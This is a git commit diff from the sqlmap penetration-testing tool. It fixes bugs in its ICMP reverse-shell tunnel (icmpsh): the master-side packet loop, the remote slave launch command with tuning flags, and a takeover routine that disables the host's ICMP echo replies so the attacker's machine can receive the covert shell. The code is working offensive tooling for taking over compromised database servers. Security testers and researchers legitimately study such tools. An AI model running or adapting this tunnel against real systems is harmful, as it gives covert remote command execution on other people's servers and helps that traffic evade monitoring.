Minor bug fixes and enhancements to ICMPsh tunnel

bdamele · bdamele · commit 56c16cb4717f · 2010-10-27T23:01:17.000Z
diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py
@@ -85,7 +85,7 @@ def main(src, dst):
                 data = icmppacket.get_data_as_string()
 
                 if len(data) > 0:
-                    print data
+                    sys.stdout.write(data)
 
                 # Parse command from standard input
                 try:
@@ -94,9 +94,7 @@ def main(src, dst):
                     pass
 
                 if cmd == 'exit':
-                    break
-
-                cmd += '\n'
+                    return
 
                 # Set sequence number and identifier
                 icmp.set_icmp_id(ident)
@@ -116,7 +114,7 @@ def main(src, dst):
                 sock.sendto(ip.get_packet(), (dst, 0))
 
 if __name__ == '__main__':
-    if len(sys.argv) < 2:
+    if len(sys.argv) < 3:
         print 'missing mandatory options. Execute as root:'
         print './icmpsh-m.py <source IP address> <destination IP address>'
         sys.exit(1)
diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py
@@ -81,7 +81,7 @@ def __runIcmpshSlaveRemote(self):
         infoMsg  = "running icmpsh slave remotely"
         logger.info(infoMsg)
 
-        self.__icmpshSlaveCmd = "%s -t %s" % (self.__icmpslaveRemote, self.lhostStr)
+        self.__icmpshSlaveCmd = "%s -t %s -d 500 -b 30 -s 128" % (self.__icmpslaveRemote, self.lhostStr)
 
         cmd = "%s &" % self.__icmpshSlaveCmd
 
diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py
@@ -7,6 +7,8 @@
 See the file 'doc/COPYING' for copying permission
 """
 
+import os
+
 from lib.core.common import readInput
 from lib.core.common import runningAsAdmin
 from lib.core.data import conf
@@ -109,7 +111,7 @@ def osPwn(self):
                 warnMsg = "invalid value, valid values are 1 and 2"
                 logger.warn(warnMsg)
 
-        if tunnel == 2 and kb.dbms != "Windows":
+        if tunnel == 2 and kb.os != "Windows":
                 errMsg = "icmpsh slave is only supported on Windows at "
                 errMsg += "the moment. The back-end database server is "
                 errMsg += "not. sqlmap will fallback to TCP (Metasploit)"
@@ -136,6 +138,21 @@ def osPwn(self):
                 errMsg += "http://oss.coresecurity.com/projects/impacket.html"
                 raise sqlmapMissingDependence, errMsg
 
+            sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all"
+
+            if os.path.exists(sysIgnoreIcmp):
+                fp = open(sysIgnoreIcmp, "wb")
+                fp.write("1")
+                fp.close()
+            else:
+                errMsg = "you need to disable ICMP replies by your machine "
+                errMsg += "system-wide. For example run on Linux/Unix:\n"
+                errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n"
+                errMsg += "If you miss doing that, you will receive "
+                errMsg += "information from the database server and it "
+                errMsg += "is unlikely to receive commands send from you"
+                logger.error(errMsg)
+
         if kb.stackedTest or conf.direct:
             web = False
 
